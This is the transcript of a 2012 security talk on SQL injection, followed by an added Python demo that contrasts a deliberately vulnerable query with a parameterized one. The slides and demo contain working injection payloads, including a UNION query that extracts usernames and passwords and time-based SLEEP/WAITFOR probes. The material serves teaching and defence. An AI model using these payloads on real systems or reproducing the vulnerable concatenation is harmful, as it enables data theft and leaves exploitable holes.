Time-Based Blind SQL Injection

This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.

A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.

Transcript

  • 1. TIME-BASED BLIND SQL INJECTION
    Matt Presson (@matt_presson), Memphis ISSA, November 2012
  • 2. WHO AM I?
    Sr. Information Security Analyst
    Focus: Application Security, Database Security, Mobile Security
  • 3. OBJECTIVE
    Quick introduction to SQL Injection
    Four main types of SQL Injection
    Time-based + Blind
    A likely scenario
    DEMOs
  • 4. INTRO TO SQL INJECTION
  • 5. DEFINITION
    “SQL injection is an attack in which malicious code is inserted into strings that are later passed to [a database] for parsing and execution.”
    “The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed.”
    Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  • 6. SAMPLE VULNERABLE CODE
    var _shipCity = Request.form("ShipCity");
    var sql = "select * from OrdersTable" + " where ShipCity = '" + _shipCity + "'";
    Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  • 7. CATEGORIES OF SQL INJECTION
    Normal: UNION queries
    Blind: Boolean expressions
    Error-based: Valid syntax that throws exceptions
    Time-based: Resource intensive or sleep-style queries
  • 8. EXAMPLES – NORMAL INJECTION
    var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '" + _shipCity + "'";
    Inject: ' UNION <data you want to extract> -- -
    Example:
    select ShipCity, Dest from Orders where ShipCity='' UNION select Username, Password from Users -- -
  • 9. EXAMPLES – BLIND INJECTION
    var sql = "select * from Orders" + " where ShipCity = '" + _shipCity + "'";
    Inject: <valid value> and <positive expression>
            <valid value> and <negative expression>
    Example:
    select * from Orders where ShipCity='Memphis' and 1=1
  • 10. EXAMPLES – ERROR-BASED INJECTION
    var sql = "select * from Orders" + " where ShipCity = '" + _shipCity + "'";
    Example (SQL Server):
    select * from Orders where ShipCity='' and 1=CAST(suser_name() as INT)-- -
    Example (MySQL):
    select * from Orders where ShipCity='' and ExtractValue(0,CONCAT(0x5c,(select user())))-- -
  • 11. EXAMPLES – TIME-BASED INJECTION
    var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '" + _shipCity + "'";
    Example (SQL Server):
    select ShipCity, Dest from Orders where ShipCity='' waitfor delay '0:0:10'
    Example (MySQL >= 5.0.12):
    select ShipCity, Dest from Orders where ShipCity='' UNION SELECT SLEEP(5), 2
  • 12. TIME-BASED + BLIND
    Same: Resource intensive or sleep/wait style functions
    New: Extract arbitrary data; Bypass business functionality
  • 13. EXAMPLES – TIME-BASED + BLIND
    var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '" + _shipCity + "'";
    Example (SQL Server):
    select ShipCity, Dest from Orders where ShipCity=''; if(<boolean>) waitfor delay '0:0:10'
    Example (MySQL >= 5.0.12):
    select ShipCity, Dest from Orders where ShipCity='' UNION SELECT IF(<bool>,SLEEP(5),1), 2
  • 14. SCENARIO
  • 15. DEMOS
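As an added example, not code from the slides, the string concatenation of slide 6 next to a parameterized version of the same lookup, run against an in-memory sqlite3 database standing in for the SQL Server/MySQL setups in the talk; the Orders and Users rows are constructed, and the payloads are the ones from slides 8 and 9. It shows why parameterization is the fix for every category on slide 7: the bound value is never parsed as SQL, so the UNION payload returns nothing and the boolean oracle has no true/false difference to time or observe.

```python
import sqlite3


def make_db():
    # Constructed in-memory schema mirroring the slides' Orders and Users tables.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Orders (ShipCity TEXT, Dest TEXT);
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Orders VALUES ('Memphis', 'Nashville'), ('Austin', 'Dallas');
        INSERT INTO Users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
    """)
    return db


def vulnerable_lookup(db, ship_city):
    # Same construction as slide 6: the request value is spliced into the SQL text,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = "select ShipCity, Dest from Orders where ShipCity = '" + ship_city + "'"
    return db.execute(sql).fetchall()


def hardened_lookup(db, ship_city):
    # Parameterized query: the driver binds ship_city as a value, so the same
    # bytes can only ever be compared against ShipCity, never executed.
    sql = "select ShipCity, Dest from Orders where ShipCity = ?"
    return db.execute(sql, (ship_city,)).fetchall()


def demo():
    db = make_db()
    union_payload = "' UNION select Username, Password from Users -- -"  # slide 8
    blind_true = "Memphis' and 1=1 -- -"                                 # slide 9
    blind_false = "Memphis' and 1=2 -- -"
    return {
        "normal_vuln": vulnerable_lookup(db, "Memphis"),
        "normal_safe": hardened_lookup(db, "Memphis"),
        "union_vuln": vulnerable_lookup(db, union_payload),   # leaks Users rows
        "union_safe": hardened_lookup(db, union_payload),     # no such city: []
        "blind_true_vuln": vulnerable_lookup(db, blind_true),   # row returned
        "blind_false_vuln": vulnerable_lookup(db, blind_false), # no row: the oracle
        "blind_true_safe": hardened_lookup(db, blind_true),     # [] either way
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:17s} -> {rows}")
```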